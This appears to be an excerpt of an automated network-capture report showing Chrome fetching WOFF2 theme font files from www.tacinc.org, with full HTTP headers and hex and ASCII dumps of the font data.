                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 8a 28 46 86 03 9e c3 c6 4b a8 38 99 e2 af b5 e0 37 ea 2a 3b 91 95 94 27 4b 75 27 0a 52 8d d0 d3 d7 42 ea 2d d5 e2 b4 4c de 2c 3a 98 96 43 cd cc 9e ea 36 f6 f0 66 44 ee d9 7d dc de 6a ef 51 fd 7d 28 29 a4 62 42 9a 28 e2 31 c4 df 97 f8 1d c7 d0 a2 fc 38 53 4a 2a de 21 cd 2d 23 e6 f0 b4 d0 bd c7 fe a9 b5 54 fe 95 96 56 c7 83 b0 3b 38 94 9c 67 93 a2 e0 03 5b fa 59 a1 59 6e 92 58 89 f7 66 ab e8 b3 e4 f5 76 db 95 6b ff 4d 32 a9 f3 d9 d6 1f 66 cd ee d6 44 e3 68 6a 74 05 da c0 49 23 16 48 73 4a 08 82 56 6e 3b 2f 86 d7 ce 7d 7f 83 b9 d6 7f c8 7e 38 7d fa df 5f 67 3d 4f 37 d2 42 b3 5c e8 dc 54 bc 8a 2e 51 99 9f 43 f0 39 5a 11 19 2d 39 6e 47 f0 f9 6a 1e f7 16 b2 a8 7a 09 f1 90 e7 2a b3 84 8e 57 e5 a6 ba d0 a2 66 ae 8e 1a 47 d5 71 5f 4e cc e1 b1 13 93 a3 92 13 d9 4f
                                                                                                                                                                                                                              Data Ascii: (FK87*;'Ku'RB-L,:C6fD}jQ}()bB(18SJ*!-#TV;8g[YYnXfvkM2fDhjtI#HsJVn;/}~8}_g=O7B\T.QC9Z-9nGjz*WfGq_NO
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: ff 0d e4 03 1d 37 3b d4 b4 fb 03 3f 18 8d 29 2d 04 3a bc bb 1b ed ef 1e b2 3a 13 13 12 3b 59 dd 33 33 7b b7 fb b3 c5 55 ed 37 03 e2 dd cb 87 52 1e 60 eb 0f 5c fc 65 71 70 5a 37 84 2f 5f b4 6c 5d dc bf f0 90 40 fc ee db 1f 86 df 00 f4 ee 62 ea 22 6e 64 22 31 31 92 bb 88 ba 2e 1d 3a aa dd 54 d9 fe 02 03 cb ac 26 49 22 97 39 9c 06 bd c3 f1 87 4e f7 c7 5b f7 16 e7 b2 7a 36 24 d9 e4 a4 6a 66 32 2f 83 97 cc 5c fc 47 d6 f7 b9 a9 a6 28 da db 5f 57 57 3e 50 18 55 53 5f 7d 41 9b 5d 52 95 b9 f8 55 25 cf 4f dc 5f c9 6f 30 e5 bc af 5e ab 22 43 be ad 7e 83 90 1b ca 42 a5 8d 6c 83 93 d6 6d b5 d0 7a 0c ce 46 b6 94 ab 8c 33 d4 fc 5e ab b3 f6 d0 d9 6a d1 9b b7 8e af d2 af 8e b7 f7 55 7c ae 85 65 ae d5 bf 1d 5c a3 81 9e 14 f7 19 ae d0 62 b2 1a 3a c5 ad cb 11 4c 7c 5e 6e aa
                                                                                                                                                                                                                              Data Ascii: 7;?)-::;Y33{U7R`\eqpZ7/_l]@b"nd"11.:T&I"9N[z6$jf2/\G(_WW>PUS_}A]RU%O_o0^"C~BlmzF3^jU|e\b:L|^n
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: b9 d8 e9 0b ef 72 2b b8 92 23 36 06 11 01 47 10 19 8b dc 1d f0 35 0a c4 36 6a e9 89 49 42 fa e2 5f ce 6c 64 13 1f 7a fc 1a e4 ec e5 ca cc ce e6 07 7b 33 df b7 81 c6 c0 98 db 3c 18 8c a7 cd 8c 59 4d 46 ab e1 23 09 f8 84 11 78 eb a7 d5 44 cf c6 e9 d1 11 cc 24 cb 79 cb e2 a3 53 4f 48 e3 43 d1 fa ec 0f 61 6e d0 dd 65 e8 cc 5b 9f 50 8f 0e ad 90 44 9b 3f c2 ee df 8e 8e bf cb 70 ff 76 1f f9 2b f7 55 55 82 57 eb 33 27 94 f9 ea 4a 66 a3 c3 b7 81 9b 76 b5 61 14 86 87 8d 1a 8b d7 64 38 10 0c e8 00 23 2a 80 05 aa 24 01 00 20 30 9a 27 91 eb 84 7a 7a 6a 68 ac 51 75 10 99 ae 40 88 81 06 31 55 2e f7 48 3e dd c4 4a 0f b1 57 5e 4f 48 41 e0 29 18 80 db 38 78 05 d0 d0 5a 0b ad b4 9f 24 81 d4 b2 0e ad b5 20 82 e1 d1 02 54 26 02 1a bb 31 a8 12 d1 e9 05 10 8c c9 7a 48 5a 6b a1
                                                                                                                                                                                                                              Data Ascii: r+#6G56jIB_ldz{3<YMF#xD$ySOHCane[PD?pv+UUW3'Jfvad8#*$ 0'zzjhQu@1U.H>JW^OHA)8xZ$ T&1zHZk


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              54192.168.2.649782141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC684OUTGET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-600.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 18912
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:28 GMT
                                                                                                                                                                                                                              ETag: "66f56b90-49e0"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c9a96e2c92-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 49 e0 00 11 00 00 00 00 ca 54 00 00 49 7c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 40 1b ec 52 1c 83 6c 06 60 00 84 2e 08 40 09 82 73 11 10 0a 81 fe 58 81 e4 0c 0b 83 70 00 01 36 02 24 03 87 5c 04 20 05 83 26 07 86 35 0c 83 64 1b ef b9 25 ec d8 0b e0 3c 20 d0 8f b4 22 18 15 65 85 4a a9 45 07 73 d8 38 f0 98 91 3f 80 e2 ff cf 48 50 32 c6 9e 87 6e 1b a8 58 56 c2 10 28 12 54 b3 4a b5 b2 44 16 c5 31 a7 e6 6c 22 99 0d 0a 14 3a 75 65 2a 45 73 e8 b4 f8 dd 0d 16 2c 5d 65 b8 6f 05 6d f5 47 37 03 ca 6f f7 d6 47 0f 2e b4 b4 9b 4c 9b 1d 0c fb be fe ef 59 47 b6 a9 e0 6f 88 2b 5c 60 e8 98 8c db 8a b1 89 7b 84 b9 1a ba 57 01 76 4b 7c 88 14 19 e2 7d e6 e1 ff ed fa 6f 9f 53 b7 d0 1a b2 5f 7f a8 c7 50 04 47 f0
                                                                                                                                                                                                                              Data Ascii: wOF2ITI|@Rl`.@sXp6$\ &5d%< "eJEs8?HP2nXV(TJD1l":ue*Es,]eomG7oG.LYGo+\`{WvK|}oS_PG
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 02 13 c2 16 00 99 64 12 cc 64 33 21 73 ac 86 ac b7 0b b2 cf 69 c8 39 97 20 08 18 ca e1 44 1c 7e 64 4a 0e c8 4e da 3b 5b 40 77 d1 5c db 0c d6 5b bf b3 0d c2 11 80 fe 7b 02 81 da a8 36 26 e1 1b 71 dd 15 9d 6d 20 7b 4f 03 02 a4 73 0c b1 26 7b 70 ed 60 ca e6 fd 7c f5 e3 6d 71 7c 24 91 12 ce 38 9a c9 f5 c6 6c a8 b7 e7 cb 7c 50 ef cf 2f f5 fe aa a1 49 ad ba cb 30 62 d8 6c 55 6f 2f 25 25 58 5a cb 9c 32 f7 50 68 75 d9 58 fe 59 76 96 e3 e5 1c e5 fb 56 43 ea 61 3d ad ad f5 c6 bc be d7 ee 0d 1c 6d 04 7f 99 cb 1a 43 93 d6 74 34 0b 9a de e6 65 9b d8 06 b7 23 db cd ed f3 6e 44 b7 73 17 d7 95 76 13 bb ad dd d5 01 64 b0 16 92 82 8e 45 4a ce 93 92 9a 8e 9e 81 91 89 99 2f 2b 3f 36 76 fe 02 44 89 96 20 4b b6 1c b9 4a 94 29 57 a1 4e 83 76 1d 66 5b 64 b1 b5 f6 3a e8 90 c3 8e
                                                                                                                                                                                                                              Data Ascii: dd3!si9 D~dJN;[@w\[{6&qm {Os&{p`|mq|$8l|P/I0blUo/%%XZ2PhuXYvVCa=mCt4e#nDsvdEJ/+?6vD KJ)WNvf[d:
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 0f 28 cf a3 81 49 e1 ed 01 16 4a 7c 6e 9a 46 e5 ab b0 ae 6d 38 98 b1 74 7c b4 4e 0c 8e 2f cf 55 ec 0c 53 2d 94 57 ed 7c af b3 f2 10 78 60 f3 36 78 5a 72 5f a9 a8 d9 b0 cd 3f 5d 5d 5b bb 44 a5 e0 c8 2d 5b 7f 85 9d 15 2f 90 2a 76 c2 b1 c8 cb 9b 89 9b 53 93 75 cb 5a 77 da 84 b2 d4 79 2d b3 94 a0 3a 9c 04 e0 fd c1 74 28 e5 f5 73 b6 1d 0f c8 58 26 76 5b 53 92 86 69 71 a9 1e 3b 77 ad 57 fd cf 9e 55 05 a4 c7 49 82 66 ab 92 24 d7 40 d6 9e 37 51 6b 8d 19 b3 1f f9 53 6d 2c b3 6f 1d 67 52 b2 be ae ff a6 e5 d5 2f be 6a 36 ae b5 be 6e fd 2c 47 30 9a d5 77 50 48 8b 76 c6 11 c7 65 00 2d e0 d7 5e 37 8f f1 ff 0f 57 17 54 5f 1d 49 de 9f 02 b2 e3 7d 04 f6 54 f6 22 34 fd 79 5f 09 64 7f 74 f1 59 13 86 42 4b f3 04 aa 38 18 91 24 3d 56 1f 44 9d 14 a4 6e 12 c8 91 c0 d5 ba 61 18
                                                                                                                                                                                                                              Data Ascii: (IJ|nFm8t|N/US-W|x`6xZr_?]][D-[/*vSuZwy-:t(sX&v[Siq;wWUIf$@7QkSm,ogR/j6n,G0wPHve-^7WT_I}T"4y_dtYBK8$=VDna
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 76 25 b1 f5 95 cc c9 13 be ba d8 50 9a ec dc 27 ed 50 dc 79 a7 c2 e2 ba 8f 50 43 31 1f c9 bb 78 4f ae 3e 37 ad 9b d1 57 15 ad 3e 22 4e cc 09 15 a8 17 cf 8f 36 80 f2 56 32 f3 54 f3 7f 0d 40 a0 d6 8c 33 e6 14 82 ab 59 b9 a9 2a ed 6e 3a 02 e0 0e 3d 31 60 88 dc b3 8a fd 88 e3 f7 d8 9d 68 4b 5a 77 46 39 bf 63 21 ae 67 be c4 df c4 f0 db bf 7d c5 ff 7e f8 ed ab 57 d4 90 40 0a 23 ac dc db cf 66 b4 7c e4 34 45 f0 13 95 50 e0 40 d4 3c 35 48 04 e1 75 c1 93 8e 91 63 a2 8c b4 99 a6 32 92 39 0b 64 ba 64 51 01 20 2c dc 6c de 3e 62 e7 e4 99 bb a2 ca d6 53 fd 9c d6 0d b7 25 9e 55 5e 39 ac a1 a3 e8 54 b8 c0 fd c2 6c 32 b1 01 17 f1 f4 b4 11 3f 55 4b 93 13 dd a7 f9 8c c7 6c 3b 64 e8 7a 19 94 9d 97 bb 2c 7f 67 62 1d dc b3 be 00 a3 56 1f 6f f5 6d 64 46 23 66 c7 32 e6 f5 27 94
                                                                                                                                                                                                                              Data Ascii: v%P'PyPC1xO>7W>"N6V2T@3Y*n:=1`hKZwF9c!g}~W@#f|4EP@<5Huc29ddQ ,l>bS%U^9Tl2?UKl;dz,gbVomdF#f2'
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 04 fc 70 e8 74 12 fc a2 6d 91 dc 6a 93 7b 90 f0 9d 72 43 21 10 25 8e 80 03 aa 23 80 83 c1 3c ba a5 be 15 28 fb 8d 09 76 0d 80 43 7e 30 0d c4 3c b0 b9 53 90 91 92 e3 92 60 12 61 11 e0 63 a0 e3 e1 a0 71 85 80 a1 16 ef fe 56 26 1b e5 f0 21 19 b2 9e 90 86 19 7e ea 08 05 1d eb a9 63 a8 18 d8 1f 0f 9c 0b 57 1c dc d3 50 7b 2b 54 1d 3b fe 67 e1 fb 03 0d cf c0 6d 63 7d 25 74 3c 03 f7 5d ad 9d d0 5d 03 08 38 cf f3 08 10 08 42 6c 73 6c 51 26 5b a8 c7 f5 0b 1b 4f 83 51 70 fd 81 07 6f 10 d1 4d 1b c8 01 5c a9 0e 03 15 48 0c 2a 38 84 0f b1 01 01 d4 10 a4 21 3a 44 01 58 ea 9e e7 e0 8c ae b8 db 40 60 7d 44 60 5e c8 a6 5a 71 95 66 b6 0a 08 fe 89 13 7f 12 44 4c 28 1b bd 8c 9e 2c f8 41 0a 49 b2 99 20 7f 61 04 cf 4b d2 85 02 f2 61 1a 0e 8e fb 87 20 2e 54 10 3e c8 51 5b d5 59
                                                                                                                                                                                                                              Data Ascii: ptmj{rC!%#<(vC~0<S`acqV&!~cWP{+T;gmc}%t<]]8BlslQ&[OQpoM\H*8!:DX@`}D`^ZqfDL(,AI aKa .T>Q[Y
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 9c 42 1f 16 76 6f 6f 12 72 61 ed ab 92 9d 78 bb 15 d1 c9 78 48 3b f8 fe b1 b1 4c 39 42 8b 2c 24 0d 92 79 40 d9 a3 31 f3 d0 76 76 0e 80 18 bd d1 0a 68 ff 90 8f 61 50 c4 12 99 38 d2 e7 54 f2 68 68 0c 51 e7 d0 f9 65 f8 43 a9 f3 76 45 51 ad e6 94 20 71 c0 31 78 9e 06 f8 15 dc 6e d3 0d c5 0c 17 21 ee cf b2 94 75 dc ef 8e 5f 42 77 33 c3 70 d6 22 31 57 23 bb df c2 65 c6 38 aa 89 4b 9d dc a0 9d 0f ee 30 4b a1 b6 e1 34 56 35 64 a8 0f a7 df ef 8e 87 21 02 1e 4a af 43 5d 88 ba 5d 68 29 1b a5 cc 53 7d a3 e3 65 7b a8 d8 95 93 c6 99 74 9e d8 78 83 cc 14 b9 00 80 13 18 be 89 93 40 b8 f7 14 eb 7f 27 ac 73 cc f6 a8 ee b0 7e a3 db f3 00 6c 0b ba fa 0a 0e 9c 95 52 c8 2f a3 66 42 b8 2a 8a 9c 42 6b bd 1a bd 61 7c a7 a2 5a 06 6c 17 01 33 86 12 87 a8 32 7b a6 81 55 a3 0f 03 4e
                                                                                                                                                                                                                              Data Ascii: BvooraxxH;L9B,$y@1vvhaP8ThhQeCvEQ q1xn!u_Bw3p"1W#e8K0K4V5d!JC]]h)S}e{tx@'s~lR/fB*Bka|Zl32{UN
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 36 7f 99 c9 fc 94 34 84 da b1 f1 15 41 13 b6 8c a5 b5 d8 0b 96 f4 e2 98 2c ff 9a d5 70 db cb 37 ea 5d 70 2b a6 13 73 d9 6e c4 3e 0c 98 80 b8 e5 ce 14 ca df d4 b1 bf b4 d7 6b 1f 2a 9c 40 7c 44 65 d4 f3 18 71 2b 35 78 b2 a8 ed 21 ba cc c6 e7 18 fa 79 29 d9 4b b1 5c 31 eb 0b d0 2e 61 49 f4 c9 62 2d 5c c9 c2 af 39 2b 57 b5 88 8b ae 8e 96 da 30 8e 44 5d f8 93 ee 2d b6 a1 b3 a5 c1 69 77 17 a7 65 15 95 61 73 ce d3 97 08 1d e1 aa 91 ef f6 72 e5 b4 9c 3d 7b bd 55 e8 c8 25 77 13 3d 8a 38 e3 fa ef 0b c5 c3 69 08 5d 06 b3 a4 28 f0 49 5e 70 8f f7 90 fe 1c b3 0b 52 c9 d4 b2 5d 68 fa a8 8b e4 8c db 4b 1c cc 15 dd ee 78 83 a1 6e 72 35 cf 98 b8 c4 95 ba 4b b1 0d b2 87 c3 3a 3d 4a 3b 8b d2 01 b5 01 21 3b 3b 53 49 35 9c 48 27 d9 c0 d8 bb 05 1f 12 d0 22 94 c7 36 a2 6d 0c 55
                                                                                                                                                                                                                              Data Ascii: 64A,p7]p+sn>k*@|Deq+5x!y)K\1.aIb-\9+W0D]-iweasr={U%w=8i](I^pR]hKxnr5K:=J;!;;SI5H'"6mU
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 74 1a 7e fc d3 98 37 f4 6b 9b ae 0f db 86 dd a9 6b 2b cc 1b 3a d6 26 ee 4b 6d 4b 25 9a e3 6b 21 13 8b 55 56 49 15 c5 e4 01 bb 5d 2e f2 14 bb b7 29 57 53 3c c9 8e 37 d5 48 c8 06 a1 d4 e2 2b 2e 6a f4 15 95 58 51 c5 9d e3 90 94 e9 0d d1 1d cd dd 1f 08 38 e2 e4 a1 c9 48 1c d2 0f f0 7e 76 8d ef 9e af 46 5c 53 74 af a8 c6 f8 f7 e0 bb 5c a4 b1 db 8e 60 fa 6b cb e3 1d ed 19 b3 6e 90 88 68 e6 84 2b 75 52 86 d0 57 ff fb 6b 25 5c 11 65 13 b7 fe bb ec 15 36 72 c9 ea 40 9e cc a7 4e 69 63 97 be 81 b0 43 73 a2 16 5c fa 05 79 db 39 b4 78 67 3e a4 3f 7f ee 50 67 53 66 85 76 de c8 f7 7a f2 fc bf e4 12 fe 40 9c ba 81 62 f1 82 dd 6e 17 38 85 b0 60 6a 39 aa d5 0b 4c 71 b9 81 6e eb 12 aa 56 a3 2b e0 a9 f3 3c 36 1a e5 52 ca bc 21 01 cd 84 74 c1 ac 34 3a cc e2 e2 2f 46 da de d8
                                                                                                                                                                                                                              Data Ascii: t~7kk+:&KmK%k!UVI].)WS<7H+.jXQ8H~vF\St\`knh+uRWk%\e6r@NicCs\y9xg>?PgSfvz@bn8`j9LqnV+<6R!t4:/F
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: da e1 8b f8 66 42 f3 84 4f 13 85 81 b4 97 a0 91 ce d5 65 75 53 9b a5 45 b6 f6 6e 99 97 52 95 d1 22 36 48 32 5a a9 55 bd fc 2d ed 16 69 51 6e 6b d6 14 28 92 ab f7 98 b1 6a b2 b4 b7 84 21 ea d6 9a ad 12 83 38 a3 85 52 d9 dd 6e 3b 6b 6a 73 56 37 d4 3e 7d e2 71 9f f9 67 b3 8f f4 ee bd b8 e6 f0 7f 4e 27 61 28 e7 c8 75 40 25 50 07 9e a3 60 48 15 3e d3 cd 8c 4f 03 1a 65 b4 52 33 f0 29 e3 a6 c9 27 5f f1 3e 87 7e f4 83 be 0a 1f 79 24 7a 4e d0 67 be 25 ad 97 a2 60 bd 64 6e 03 59 92 f4 7a 5c ad 9b 82 55 52 f3 43 c8 60 e9 b1 0a bf fb f6 60 eb fc 4a 7e 81 ab dc ef b7 68 41 41 21 61 b4 cf 37 4a 4a 38 25 92 cb a9 ec f9 f9 01 e1 fc 40 07 ca 0c 74 4f 9f 58 37 11 da 3d 3f 58 17 ac 85 95 81 c5 df 8e 21 3e ab 35 a7 e5 32 fd 88 c9 32 cb b2 4b 04 4a 3e 16 79 fc 89 36 75 e5 5a
                                                                                                                                                                                                                              Data Ascii: fBOeuSEnR"6H2ZU-iQnk(j!8Rn;kjsV7>}qgN'a(u@%P`H>OeR3)'_>~y$zNg%`dnYz\URC``J~hAA!a7JJ8%@tOX7=?X!>522KJ>y6uZ
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: ec 69 4e 66 20 95 4b ee 7e 5a 26 0b b5 c7 27 b1 84 2a c9 d8 c1 1b 3f c9 2a f7 5d fd 89 c2 14 a8 dc b5 19 9e e3 eb 11 3e 5e 38 7d e7 a3 4d aa 2e a6 41 22 b9 6e 8a 94 e7 22 48 b4 98 8a 25 f8 ed 4e ed ca e6 89 5c 39 1d 91 5c 0f 45 ce 2b c4 0b 55 c8 52 21 e0 1b cd 97 a9 e4 b4 33 5d 4a d3 97 3a c6 ad 19 bd 24 98 1c a1 ce 00 ba 78 66 83 be 4e 87 c6 d8 d0 59 d7 0d 0f 36 9d 7e 85 42 4b ad 66 6d ec 48 d9 4a 91 68 a5 2c 39 dc 6b ae 30 47 b0 b0 8e 8f 2e 24 97 5b 88 7c 80 71 b0 9c 6c d6 43 14 3c 23 e6 61 bf 58 b5 e2 5f 2b dd 3f 50 7f 51 ed 18 38 97 3f d0 ed 1e c4 b6 e9 fb 70 6d b8 9d fa b6 5f 53 54 b3 b0 eb 71 b3 4a 6d c7 bd b4 6c 53 7b 81 6b f8 de 41 78 50 ea 8e 33 5f 44 47 ed 3b 59 9f 4f 6b fc e4 fe 75 8b e3 66 fd 05 2c 53 c0 84 fd ae 0a 81 e6 45 d1 67 be ef f7 6f
                                                                                                                                                                                                                              Data Ascii: iNf K~Z&'*?*]>^8}M.A"n"H%N\9\E+UR!3]J:$xfNY6~BKfmHJh,9k0G.$[|qlC<#aX_+?PQ8?pm_STqJmlS{kAxP3_DG;YOkuf,SEgo


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              55192.168.2.649779141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC688OUTGET /wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-regular.woff2 HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              Origin: https://www.tacinc.org
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:06 GMT
                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                              Content-Length: 17784
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 14:11:28 GMT
                                                                                                                                                                                                                              ETag: "66f56b90-4578"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614818
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c9af3f4791-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC943INData Raw: 77 4f 46 32 00 01 00 00 00 00 45 78 00 11 00 00 00 00 c9 18 00 00 45 14 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 40 1b ea 36 1c 83 6c 06 60 00 84 2e 08 3e 09 82 73 11 10 0a 81 ff 20 81 e4 10 0b 83 70 00 01 36 02 24 03 87 5c 04 20 05 82 70 07 86 35 0c 83 32 1b 6d b8 25 78 f3 a0 e5 76 60 ec e8 75 e1 cf 46 d4 a0 3b 50 f5 a2 63 5d 9b 1d b0 61 e3 80 0c 6d fc 4d d9 ff 9f 92 5c 8c 61 40 1b 78 a6 99 6d fb 87 55 82 a8 96 50 f5 42 15 15 ce c2 98 9d ae 42 c4 0a 16 0d a4 e8 f6 46 f5 34 3c 28 9c 4d cd 4f d4 aa c8 69 f5 5d 51 dd 97 79 b3 55 1e f9 f0 c9 3e bc 6d e5 17 44 5f fa 1e 2b 58 85 6c 18 9d 9c 1f ee bf 13 37 4f 0f 1a 22 e4 ba b0 6e 74 35 d0 0f 4d e5 b7 7b 1a 99 8d e1 12 8e 0f 9a 6d e9 57 9d 63 9b ff 27 6f 8a 5c 7a eb af 6e c7 17
                                                                                                                                                                                                                              Data Ascii: wOF2ExE@6l`.>s p6$\ p52m%xv`uF;Pc]amM\a@xmUPBBF4<(MOi]QyU>mD_+Xl7O"nt5M{mWc'o\zn
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: a4 54 90 0c 08 59 54 10 56 5a 09 69 95 0d 10 36 db 03 e1 80 93 10 ce ba 01 61 dc 3d 08 08 40 83 90 41 d0 82 45 ae 10 20 be ce 1a e8 02 ec 4f 03 cd 9d 40 fa 3d 39 d8 03 2a 40 00 e5 24 02 d6 6e 11 dd 22 19 ea 3e 1c 3f 38 d0 03 88 cf 3a 80 00 2e 49 64 9c 03 67 d5 ad aa eb e8 f4 9c dc 33 7c 18 2b 52 11 ae 88 84 b0 46 10 bf cb 85 d4 a1 03 c8 03 c8 63 e8 5a e4 49 74 2d 8a 83 3e 86 52 a2 ae a0 ee a2 4f a2 03 50 0e 44 84 38 90 01 b2 bd e6 8b 40 b5 d0 2e a8 05 ea 83 96 e5 96 0f 40 c7 a0 93 d0 6d e8 3d b4 0b 1d 98 ba ad dd b6 01 7d ec ef f5 49 f4 15 f4 7b 18 08 93 87 e1 60 3c 98 99 98 1d 98 77 30 7f bf c8 29 a2 94 50 4a 4b ca cc 94 4d 29 c3 29 0f 53 fe bd 89 00 a1 91 26 12 23 31 aa 08 0d 03 5b 31 0e 01 21 91 12 52 32 72 0a 4a 2a 06 46 36 01 41 21 61 b5 ea d4 4b 68
                                                                                                                                                                                                                              Data Ascii: TYTVZi6a=@AE O@=9*@$n">?8:.Idg3|+RFcZIt->ROPD8@.@m=}I{`<w0)PJKM))S&#1[1!R2rJ*F6A!aKh
                                                                                                                                                                                                                              2024-10-23 18:04:06 UTC1369INData Raw: 3a 88 26 9c 60 26 6e c0 e9 98 d0 71 52 51 8d 54 f8 7d b8 32 d5 28 6a f5 50 0b 19 fd 92 b8 8e f9 95 6a 3e a1 18 79 b4 e5 84 dc 6d 89 3d 13 c6 c1 9d a6 4d 37 9a 4c 1d 0f b4 e7 07 0a cc 5d 53 a3 a1 95 10 4e 86 70 99 91 57 ae cb a9 5b 3e da 7a f3 11 a9 e7 f5 e6 ad 08 20 cf 49 f1 1a 6b a2 ad 15 99 23 81 6e 5b 49 56 f8 6a 54 81 7f 75 fa da c8 48 2c 97 55 b5 a2 79 c9 c9 05 fe 80 00 86 0d 40 d8 29 77 78 69 f0 07 9e 57 28 89 2a af c7 0f 10 72 f9 4a 59 f0 55 d5 6a 8d a2 23 d2 ea a4 9b 86 9c 90 32 bf bb 3d 39 3e 68 89 9a fb 2f 52 f7 42 d2 a0 e1 f4 aa 03 b1 2c 4e 35 fc 7d 85 51 8a 27 d6 6b 5c 9d a5 98 24 6e 35 ce b3 9d 8b 7f 42 b7 4d 1a 18 b8 3a 84 60 8f 2c cc c0 0b 9c 0e d8 c7 32 08 c9 28 7a 5d 47 7a 5c a6 bd a6 37 fb dc ea 5e 05 a9 b8 a9 5b 4c a4 09 0b 03 82 10 92
                                                                                                                                                                                                                              Data Ascii: :&`&nqRQT}2(jPj>ym=M7L]SNpW[>z Ik#n[IVjTuH,Uy@)wxiW(*rJYUj#2=9>h/RB,N5}Q'k\$n5BM:`,2(z]Gz\7^[L
